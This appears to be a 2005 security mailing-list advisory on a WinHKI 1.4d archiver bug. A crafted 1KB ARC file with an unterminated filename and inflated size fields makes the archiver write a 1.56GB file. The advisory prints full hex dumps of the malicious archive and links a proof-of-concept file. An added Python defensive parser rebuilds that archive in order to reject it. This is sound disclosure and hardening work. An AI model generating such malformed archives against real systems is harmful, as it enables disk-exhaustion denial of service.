Date: Fri, 07 Jan 2005 01:17:03 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com,
 Windows NTBugtraq Mailing List <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>,
 vulnwatch@...nwatch.org, news@...uriteam.com,
 "securitytracker.com" <bugs@...uritytracker.com>
Subject: WinHKI - ARC File Extraction of 1KB to 1.56GB


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:    WinHKI
Vendors:        http://www.webtoolmaster.com
Versions:       1.4d
Platforms:      Windows
Bug:            ARC File Extraction of 1KB to 1.56GB
Exploitation:   Local (extract file)
Date:           24 Dec 2004
Author:         Rafel Ivgi, The-Insider
E-Mail:         the_insider@...l.com
Website:        http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

WinHKI is a file archiver which supports the ARC, BH, CAB, HKI, JAR, LHA, TAR and
GZ compression formats.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

This is the header of a normal ARC archive entry (marker byte 1A, method byte 02,
a 13-byte NUL-padded filename field, then the 4-byte compressed size, date, time,
CRC and 4-byte original size; the 27-byte stored body follows and 1A 00 ends the
archive):

00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B ..251.HTM.^^^^^.
00000010 0000 0078 3139 73B5 121B 0000 003C 7363 ...x19s......<sc
00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73 ript.>alert()</s
00000030 6372 6970 743E 0D0A 1A00                cript>....

By inserting a run of bytes after the filename field and replacing every NUL (00)
with FF (so that the long filename string is never terminated), a roughly 1KB
archive results. In the crafted file below, 0x400 (1024) bytes of FF sit between
the filename field and the compressed-size field, and the NULs in the filename
field and in both size fields have become FF, so each size field now reads
1B FF FF FF:

00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF ..251.HTM.^^^^^.
00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B ................
00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363 ...x19s......<sc
00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73 ript.>alert()</s
00000430 6372 6970 743E 0D0A 1A00                cript>....


WinHKI will create a 1.56 GB file at the selected extraction location.
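A defensive parser for the ARC entry header laid out above, added here as an illustration and not part of the original advisory or of WinHKI: it rebuilds both hex dumps from the advisory byte for byte, refuses a 13-byte filename field that is not NUL-terminated inside the field, and refuses size fields that exceed the data actually present or an extraction budget. The limits (64 MB output, 1000:1 ratio), the third "size-lie" sample and the simplification that only methods 2..9 with the 29-byte header are accepted are this example's own assumptions, not anything the advisory states about WinHKI's parser.

```python
import struct

ARC_MARK = 0x1A
# ARC entry header for methods 2..9 (little-endian): marker, method,
# 13-byte NUL-padded filename, compressed size, DOS date, DOS time,
# CRC-16, original size.  29 bytes in total.
ENTRY_HDR = struct.Struct("<BB13sIHHHI")

# The "normal" 58-byte archive, copied from the advisory's first hex dump.
NORMAL_ARC = bytes.fromhex(
    "1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B"
    "0000 0078 3139 73B5 121B 0000 003C 7363"
    "7269 7074 FB3E 616C 6572 7428 293C 2F73"
    "6372 6970 743E 0D0A 1A00"
)
PAYLOAD = b"<script\xfb>alert()</script>\r\n"   # the 27-byte stored entry body


def build_malformed_arc(padding=0x400):
    """Rebuild the advisory's crafted archive: `padding` bytes of 0xFF are
    inserted between the filename field and the size fields, and every NUL
    in the filename and size fields becomes 0xFF (so a NUL-seeking name copy
    never stops).  With the default padding this is 0x43A = 1082 bytes."""
    return (bytes([ARC_MARK, 2]) + b"251.HTM\xff^^^^^" + b"\xff" * padding
            + b"\x1b\xff\xff\xff"                 # compressed size, now 0xFFFFFF1B
            + bytes.fromhex("78313973B512")       # date, time, CRC as in the dump
            + b"\x1b\xff\xff\xff"                 # original size, now 0xFFFFFF1B
            + PAYLOAD + bytes([ARC_MARK, 0]))


def build_size_lie_arc():
    """Constructed here, not taken from the advisory: a properly terminated
    filename but both size fields set to 0xFFFFFF1B, which isolates the
    declared-size problem from the unterminated-name problem."""
    hdr = ENTRY_HDR.pack(ARC_MARK, 2, b"251.HTM\x00^^^^^",
                         0xFFFFFF1B, 0x3178, 0x7339, 0x12B5, 0xFFFFFF1B)
    return hdr + PAYLOAD + bytes([ARC_MARK, 0])


class ArcFormatError(ValueError):
    """Raised for any header the defensive parser refuses to act on."""


def parse_arc(data, max_output=64 * 1024 * 1024, max_ratio=1000):
    """Walk the entry headers, validating every field before trusting it.
    max_output and max_ratio are policy knobs chosen for this example."""
    entries, pos = [], 0
    while True:
        if pos + 2 > len(data):
            raise ArcFormatError("truncated: no end-of-archive marker")
        mark, method = data[pos], data[pos + 1]
        if mark != ARC_MARK:
            raise ArcFormatError(f"bad marker 0x{mark:02X} at offset {pos}")
        if method == 0:
            return entries                      # 1A 00 ends the archive
        if not 2 <= method <= 9:
            raise ArcFormatError(f"unsupported method {method} at offset {pos}")
        if pos + ENTRY_HDR.size > len(data):
            raise ArcFormatError(f"truncated entry header at offset {pos}")
        _, _, raw_name, comp, _date, _time, _crc, orig = ENTRY_HDR.unpack_from(data, pos)
        # The filename lives in exactly 13 bytes and must be NUL-terminated
        # inside them; never scan past the field looking for a terminator.
        if b"\x00" not in raw_name:
            raise ArcFormatError(f"filename not NUL-terminated within 13 bytes at offset {pos + 2}")
        name = raw_name.split(b"\x00", 1)[0].decode("ascii", "replace")
        if not name or "/" in name or "\\" in name or ".." in name:
            raise ArcFormatError(f"unsafe filename {name!r}")
        body = pos + ENTRY_HDR.size
        # The declared compressed size must fit in the bytes actually present
        # (leaving room for the 2-byte end marker).
        if comp > len(data) - body - 2:
            raise ArcFormatError(f"compressed size {comp} exceeds remaining archive data")
        # Bound what extraction may write, absolutely and relative to the input.
        if orig > max_output or orig > max(comp, 1) * max_ratio:
            raise ArcFormatError(f"original size {orig} exceeds extraction limits")
        if method == 2 and comp != orig:        # method 2 is stored: sizes must agree
            raise ArcFormatError("stored entry with mismatched sizes")
        entries.append({"name": name, "method": method, "compressed": comp,
                        "original": orig, "data": data[body:body + comp]})
        pos = body + comp


def classify(data):
    """('ok', entries) for an archive the parser accepts, else ('rejected', reason)."""
    try:
        return ("ok", parse_arc(data))
    except ArcFormatError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    for label, blob in (("normal", NORMAL_ARC),
                        ("advisory PoC layout", build_malformed_arc()),
                        ("size-field lie", build_size_lie_arc())):
        verdict, detail = classify(blob)
        print(f"{label:20} {len(blob):5} bytes -> {verdict}: "
              f"{detail if verdict == 'rejected' else f'{len(detail)} entry(s)'}")
```

Run stand-alone it prints one line per sample: the normal archive yields the single stored entry 251.HTM of 27 bytes, the advisory's layout is rejected at the filename check before any size field is read, and the size-lie sample is rejected because its declared compressed size is larger than the archive itself. The order of the checks matters: validating the name field first means the 1024 bytes of FF are never interpreted as header data at all.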

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

An online proof of concept can be found at:
http://theinsider.deep-ice.com/hki156gb.ARC

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."


